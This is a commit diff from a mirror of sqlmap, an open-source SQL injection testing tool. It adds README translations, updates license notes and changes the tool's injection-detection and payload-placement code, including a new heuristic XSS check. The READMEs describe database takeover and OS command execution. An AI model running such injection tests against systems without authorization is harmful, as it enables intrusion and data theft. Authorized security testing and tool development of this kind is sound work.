mirror of https://github.com/sqlmapproject/sqlmap.git, synced 2025-07-30 01:50:01 +03:00
commit 3f22fd7a9b
@@ -55,5 +55,8 @@ Links
Translations
----

-* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.

-sqlmap is (C) 2006-2013 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2014 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.

This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
487 doc/THANKS.md (file diff suppressed because it is too large)
@@ -20,6 +20,8 @@ This file lists bundled packages and their associated licensing terms.
* The Oset library located under thirdparty/oset/.
    Copyright (C) 2010, BlueDynamics Alliance, Austria.
    Copyright (C) 2009, Raymond Hettinger, and others.
+* The PrettyPrint library located under thirdparty/prettyprint/.
+    Copyright (C) 2010, Chris Hall.
* The SocksiPy library located under thirdparty/socks/.
    Copyright (C) 2006, Dan-Haim.

@@ -55,7 +57,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    Copyright (C) 2008-2009, Jose Fonseca.
* The KeepAlive library located under thirdparty/keepalive/.
    Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipartpost/.
+* The MultipartPost library located under thirdparty/multipart/.
    Copyright (C) 2006, Will Holcomb.
* The XDot library located under thirdparty/xdot/.
    Copyright (C) 2008, Jose Fonseca.

@@ -281,8 +283,6 @@ be bound by the terms and conditions of this License Agreement.
    Copyright (C) 2012, Marcel Hellkamp.
* The PageRank library located under thirdparty/pagerank/.
    Copyright (C) 2010, Corey Goldberg.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-    Copyright (C) 2010, Chris Hall.
* The Termcolor library located under thirdparty/termcolor/.
    Copyright (C) 2008-2011, Volvox Development Team.
53 doc/translations/README-gr-GR.md (new file)
@@ -0,0 +1,53 @@
sqlmap
==

sqlmap is an open source tool that automates the detection and exploitation of SQL injection vulnerabilities in databases. It comes with a powerful detection engine, many specialized features for the ultimate penetration tester, and a broad range of options, from fingerprinting the database and fetching its data to accessing the underlying file system and executing commands directly on the operating system via out-of-band connections.

Screenshots
----

![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)

You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features.

Installation
----

You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).

Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.

Usage
----

To get a list of basic options use:

    python sqlmap.py -h

To get a list of all options use:

    python sqlmap.py -hh

You can see a sample run of the program [here](https://gist.github.com/stamparm/5335217).
For an overview of sqlmap's capabilities, a list of supported features and a description of all options, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).

Links
----

* Homepage: http://sqlmap.org
* Downloads: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
53 doc/translations/README-hr-HR.md (new file)
@@ -0,0 +1,53 @@
sqlmap
==

sqlmap is a penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many useful options for advanced penetration testing, and a broad range of features, from database fingerprinting and fetching data from the database to accessing the affected file system and executing commands on the operating system via so-called "out-of-band" connections.

Screenshots
----

![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)

You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki pages.

Installation
----

You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).

Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and/or **2.7.x** on any platform.

Usage
----

To get a list of basic options and switches use:

    python sqlmap.py -h

To get a list of all options and switches use:

    python sqlmap.py -hh

You can find a sample run [here](https://gist.github.com/stamparm/5335217).
To get an overview of sqlmap's capabilities, a list of supported features and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).

Links
----

* Homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
52 doc/translations/README-zh-CN.md (new file)
@@ -0,0 +1,52 @@
sqlmap
==

sqlmap is an open source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and penetration testing options for many different types of databases, including fetching data stored in the database, accessing operating system files, and even executing operating system commands via out-of-band data connections.

Screenshots
----

![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)

You can visit the [screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) page on the wiki for demonstrations of various usages.

Installation
----

You can click [here](https://github.com/sqlmapproject/sqlmap/tarball/master) to download the latest `tar` source archive, or click [here](https://github.com/sqlmapproject/sqlmap/zipball/master) to download the latest `zip` source archive.

It is recommended to get the latest source code from the [Git](https://github.com/sqlmapproject/sqlmap) repository:

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap runs with [Python](http://www.python.org/download/) versions **2.6.x** and **2.7.x** on any platform.

Usage
----

The following command shows the basic usage and command-line options:

    python sqlmap.py -h

The following command shows all usage and command-line options:

    python sqlmap.py -hh

You can see a sample sqlmap run [here](https://gist.github.com/stamparm/5335217). Beyond that, you can consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for help with all of sqlmap's supported features, parameters, command-line options and switches, along with explanations.

Links
----

* Homepage: http://sqlmap.org
* Source downloads: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Tutorials: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -58,6 +58,7 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
@@ -84,7 +85,13 @@ def checkSqlInjection(place, parameter, value):
    # Set the flag for SQL injection test mode
    kb.testMode = True

    for test in getSortedInjectionTests():
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    tests = getSortedInjectionTests()

    while tests:
        test = tests.pop(0)

        try:
            if kb.endDetection:
                break
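The hunk above swaps the plain for-loop over getSortedInjectionTests() for an explicit work queue consumed with pop(0). A rough sketch of why that helps (illustrative only, with made-up test names, not sqlmap's API): a mutable queue lets the detection loop push the current test back to the front and run it again, which the later `tests.insert(0, test)` hunk relies on when the user changes verbosity mid-run.

    # Minimal sketch (assumed names, not sqlmap's API): a work queue that allows
    # re-queuing the current test, which a plain for-loop cannot do cleanly.
    def run_tests(tests):
        tests = list(tests)           # work on a mutable copy
        results = []
        while tests:
            test = tests.pop(0)       # take the next pending test
            if test == "retry-me" and "retried" not in results:
                results.append("retried")
                tests.insert(0, test) # put the same test back at the front and run it again
                continue
            results.append(test)
        return results

    print(run_tests(["boolean-blind", "retry-me", "time-blind"]))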
@@ -398,7 +405,7 @@ def checkSqlInjection(place, parameter, value):

    # Perform the test's False request
    if not falseResult:
        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
        logger.info(infoMsg)

        injectable = True

@@ -409,7 +416,7 @@ def checkSqlInjection(place, parameter, value):
    candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
    if candidates:
        conf.string = candidates[0]
        infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
        infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
        logger.info(infoMsg)

        injectable = True

@@ -432,7 +439,7 @@ def checkSqlInjection(place, parameter, value):
    result = output == "1"

    if result:
        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
        infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
        logger.info(infoMsg)

        injectable = True

@@ -454,7 +461,7 @@ def checkSqlInjection(place, parameter, value):
    trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)

    if trueResult:
        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
        infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
        logger.info(infoMsg)

        injectable = True

@@ -490,7 +497,7 @@ def checkSqlInjection(place, parameter, value):
    reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)

    if isinstance(reqPayload, basestring):
        infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
        infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
        logger.info(infoMsg)

        injectable = True

@@ -596,6 +603,7 @@ def checkSqlInjection(place, parameter, value):
    choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
    conf.verbose = int(choice)
    setVerbosity()
    tests.insert(0, test)
elif choice[0] in ("n", "N"):
    return None
elif choice[0] in ("e", "E"):
@@ -781,6 +789,8 @@ def heuristicCheckSqlInjection(place, parameter):

    origValue = conf.paramDict[place][parameter]

    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    prefix = ""
    suffix = ""

@@ -806,8 +816,8 @@ def heuristicCheckSqlInjection(place, parameter):
    parseFilePaths(page)
    result = wasLastResponseDBMSError()

    infoMsg = "heuristic (basic) test shows that %s " % place
    infoMsg += "parameter '%s' might " % parameter
    infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
    infoMsg += "'%s' might " % parameter

    def _(page):
        return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)

@@ -848,6 +858,23 @@ def heuristicCheckSqlInjection(place, parameter):
        infoMsg += "not be injectable"
        logger.warn(infoMsg)

    kb.heuristicMode = True

    value = "%s%s%s" % (randomStr(), DUMMY_XSS_CHECK_APPENDIX, randomStr())
    payload = "%s%s%s" % (prefix, "'%s" % value, suffix)
    payload = agent.payload(place, parameter, newValue=payload)
    page, _ = Request.queryPage(payload, place, content=True, raise404=False)

    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    if value in (page or ""):
        infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
        infoMsg += "'%s' might " % parameter
        infoMsg += "be vulnerable to XSS attacks"
        logger.info(infoMsg)

    kb.heuristicMode = False

    return kb.heuristicTest

def checkDynParam(place, parameter, value):
@@ -864,7 +891,9 @@ def checkDynParam(place, parameter, value):
    dynResult = None
    randInt = randomInt()

    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
    logger.info(infoMsg)

    try:

@@ -872,7 +901,7 @@ def checkDynParam(place, parameter, value):
        dynResult = Request.queryPage(payload, place, raise404=False)

        if not dynResult:
            infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
            infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
            logger.info(infoMsg)

            randInt = randomInt()
@@ -126,8 +126,8 @@ def _selectInjection():
    kb.injection = kb.injections[index]

def _formatInjection(inj):
    data = "Place: %s\n" % inj.place
    data += "Parameter: %s\n" % inj.parameter
    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)

    for stype, sdata in inj.data.items():
        title = sdata.title

@@ -146,7 +146,7 @@ def _formatInjection(inj):
        vector = "%s%s" % (vector, comment)
        data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
        data += " Title: %s\n" % title
        data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
        data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
        data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"

    return data
@@ -251,7 +251,7 @@ def start():
        return True

    if conf.url and not any((conf.forms, conf.crawlDepth)):
        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))

    if conf.configFile and not kb.targets:
        errMsg = "you did not edit the configuration file properly, set "

@@ -264,13 +264,16 @@ def start():
        logger.info(infoMsg)

    hostCount = 0
    initialHeaders = list(conf.httpHeaders)

    for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
        try:
            conf.url = targetUrl
            conf.method = targetMethod
            conf.method = targetMethod.upper() if targetMethod else targetMethod
            conf.data = targetData
            conf.cookie = targetCookie
            conf.httpHeaders = list(initialHeaders)
            conf.httpHeaders.extend(targetHeaders or [])

            initTargetEnv()
            parseTargetUrl()
@@ -308,13 +311,13 @@ def start():
            if conf.forms:
                message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
            else:
                message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
                message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")

            if conf.cookie:
                message += "\nCookie: %s" % conf.cookie

            if conf.data is not None:
                message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
                message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")

            if conf.forms:
                if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:

@@ -324,13 +327,13 @@ def start():
                test = readInput(message, default="Y")

                if not test or test[0] in ("y", "Y"):
                    if conf.method == HTTPMETHOD.POST:
                        message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                    if conf.method != HTTPMETHOD.GET:
                        message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                        conf.data = readInput(message, default=conf.data)
                        conf.data = _randomFillBlankFields(conf.data)
                        conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data

                    elif conf.method == HTTPMETHOD.GET:
                    else:
                        if targetUrl.find("?") > -1:
                            firstPart = targetUrl[:targetUrl.find("?")]
                            secondPart = targetUrl[targetUrl.find("?") + 1:]
@@ -425,6 +428,8 @@ def start():

    paramDict = conf.paramDict[place]

    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place

    for parameter, value in paramDict.items():
        if not proceed:
            break

@@ -436,7 +441,7 @@ def start():
        if paramKey in kb.testedParams:
            testSqlInj = False

            infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
            infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
            logger.info(infoMsg)

        elif parameter in conf.testParameter:

@@ -445,31 +450,37 @@ def start():
        elif parameter == conf.rParam:
            testSqlInj = False

            infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
            infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
            logger.info(infoMsg)

        elif parameter in conf.skip:
            testSqlInj = False

            infoMsg = "skipping %s parameter '%s'" % (place, parameter)
            infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
            logger.info(infoMsg)

        elif parameter == conf.csrfToken:
            testSqlInj = False

            infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
            logger.info(infoMsg)

        # Ignore session-like parameters for --level < 4
        elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
            testSqlInj = False

            infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
            infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
            logger.info(infoMsg)

        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
            check = checkDynParam(place, parameter, value)

            if not check:
                warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
                warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                logger.warn(warnMsg)

            else:
                infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                logger.info(infoMsg)

            kb.testedParams.add(paramKey)
@@ -479,11 +490,11 @@ def start():

        if check != HEURISTIC_TEST.POSITIVE:
            if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
                infoMsg = "skipping %s parameter '%s'" % (place, parameter)
                infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                logger.info(infoMsg)
                continue

        infoMsg = "testing for SQL injection on %s " % place
        infoMsg = "testing for SQL injection on %s " % paramType
        infoMsg += "parameter '%s'" % parameter
        logger.info(infoMsg)

@@ -506,7 +517,7 @@ def start():
            paramKey = (conf.hostname, conf.path, None, None)
            kb.testedParams.add(paramKey)
        else:
            warnMsg = "%s parameter '%s' is not " % (place, parameter)
            warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
            warnMsg += "injectable"
            logger.warn(warnMsg)
@@ -10,6 +10,7 @@ import re
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isNumber
from lib.core.common import isTechniqueAvailable

@@ -32,6 +33,8 @@ from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
@@ -85,7 +88,7 @@ class Agent(object):

        paramString = conf.parameters[place]
        paramDict = conf.paramDict[place]
        origValue = paramDict[parameter]
        origValue = getUnicode(paramDict[parameter])

        if place == PLACE.URI:
            paramString = origValue

@@ -99,10 +102,8 @@ class Agent(object):
            origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                origValue = origValue.split('>')[-1]
            elif kb.postHint == POST_HINT.JSON:
                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
            elif kb.postHint == POST_HINT.JSON_LIKE:
                origValue = extractRegexResult(r'(?s)\'\s*:\s*(?P<result>\d+\Z)', origValue) or extractRegexResult(r"(?s)(?P<result>[^']+\Z)", origValue)
            elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
                origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
            else:
                _ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
                origValue = _.split('=', 1)[1] if '=' in _ else ""
@@ -110,6 +111,9 @@ class Agent(object):
            paramString = origValue
            origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
            origValue = origValue[origValue.index(',') + 1:]
            match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
            if match:
                origValue = match.group("value")

        if conf.prefix:
            value = origValue
@@ -153,9 +157,27 @@ class Agent(object):
        elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
            retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
        else:
            retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
            def _(pattern, repl, string):
                retVal = string
                match = None
                for match in re.finditer(pattern, string):
                    pass
                if match:
                    while True:
                        _ = re.search(r"\\g<([^>]+)>", repl)
                        if _:
                            repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
                        else:
                            break
                    retVal = string[:match.start()] + repl + string[match.end():]
                return retVal

            if origValue:
                retVal = _(r"(\A|\b)%s=%s(\Z|\b)" % (re.escape(parameter), re.escape(origValue)), "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
            else:
                retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
            if retVal == paramString and urlencode(parameter) != parameter:
                retVal = re.sub(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
                retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)

        return retVal
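The helper `_` introduced in the hunk above substitutes only the last regex match inside the parameter string and expands \g<N> group references by hand. A simplified standalone sketch of the same idea (hypothetical parameter data, no group-reference handling):

    import re

    def replace_last(pattern, repl, string):
        """Replace only the last regex match in a string (sketch of the idea above)."""
        match = None
        for match in re.finditer(pattern, string):   # remember the final match only
            pass
        if match is None:
            return string
        return string[:match.start()] + repl + string[match.end():]

    params = "id=1&cat=2&id=3"
    print(replace_last(r"\bid=\d+", "id=1 AND 2=2", params))  # id=1&cat=2&id=1 AND 2=2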
@@ -987,7 +1009,7 @@ class Agent(object):
        """

        _ = re.escape(PAYLOAD_DELIMITER)
        return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
        return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value

    def runAsDBMSUser(self, query):
        if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
@@ -13,6 +13,7 @@ except:
import os
import tempfile

from lib.core.exception import SqlmapSystemException
from lib.core.settings import BIGARRAY_CHUNK_LENGTH

class Cache(object):

@@ -33,8 +34,9 @@ class BigArray(list):
    def __init__(self):
        self.chunks = [[]]
        self.cache = None
        self.length = 0
        self.filenames = set()
        self.protected = False
        self._os_remove = os.remove

    def append(self, value):
        self.chunks[-1].append(value)
@@ -62,12 +64,17 @@ class BigArray(list):
        return ValueError, "%s is not in list" % value

    def _dump(self, value):
        handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
        self.filenames.add(filename)
        os.close(handle)
        with open(filename, "w+b") as fp:
            pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
        return filename
        try:
            handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
            self.filenames.add(filename)
            os.close(handle)
            with open(filename, "w+b") as fp:
                pickle.dump(value, fp, pickle.HIGHEST_PROTOCOL)
            return filename
        except IOError, ex:
            errMsg = "exception occurred while storing data "
            errMsg += "to a temporary file ('%s')" % ex
            raise SqlmapSystemException, errMsg

    def _checkcache(self, index):
        if (self.cache and self.cache.index != index and self.cache.dirty):
@@ -77,6 +84,14 @@ class BigArray(list):
            with open(self.chunks[index], "rb") as fp:
                self.cache = Cache(index, pickle.load(fp), False)

    def __getstate__(self):
        self.protected = True
        return self.chunks, self.filenames, self.protected

    def __setstate__(self, state):
        self.__init__()
        self.chunks, self.filenames, self.protected = state

    def __getslice__(self, i, j):
        retval = BigArray()
        i = max(0, len(self) + i if i < 0 else i)
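The `__getstate__`/`__setstate__` pair added here, together with the `protected` flag checked in `__del__` in the next hunk, prevents a pickled-and-restored object from deleting temporary files that the original instance still needs. A minimal sketch of the pattern, assuming a toy class rather than sqlmap's BigArray:

    import os
    import pickle
    import tempfile

    class SpillList(object):
        """Toy list-like container that spills data to a temp file (assumed names)."""
        def __init__(self):
            self.filenames = set()
            self.protected = False

        def spill(self, data):
            handle, filename = tempfile.mkstemp(prefix="spill-")
            os.close(handle)
            with open(filename, "w+b") as fp:
                pickle.dump(data, fp, pickle.HIGHEST_PROTOCOL)
            self.filenames.add(filename)

        def __getstate__(self):
            self.protected = True                  # mark the source as shared before pickling
            return self.filenames, self.protected

        def __setstate__(self, state):
            self.__init__()
            self.filenames, self.protected = state # restored copies never delete shared files

        def __del__(self):
            if not self.protected:                 # only an unshared owner cleans up its files
                for filename in self.filenames:
                    try:
                        os.remove(filename)
                    except OSError:
                        pass

    original = SpillList()
    original.spill(list(range(10)))
    clone = pickle.loads(pickle.dumps(original))   # both objects now carry protected=True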
@@ -119,8 +134,9 @@ class BigArray(list):
        return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * BIGARRAY_CHUNK_LENGTH + len(self.chunks[-1])

    def __del__(self):
        for filename in self.filenames:
            try:
                os.remove(filename)
            except:
                pass
        if not self.protected:
            for filename in self.filenames:
                try:
                    self._os_remove(filename)
                except:
                    pass
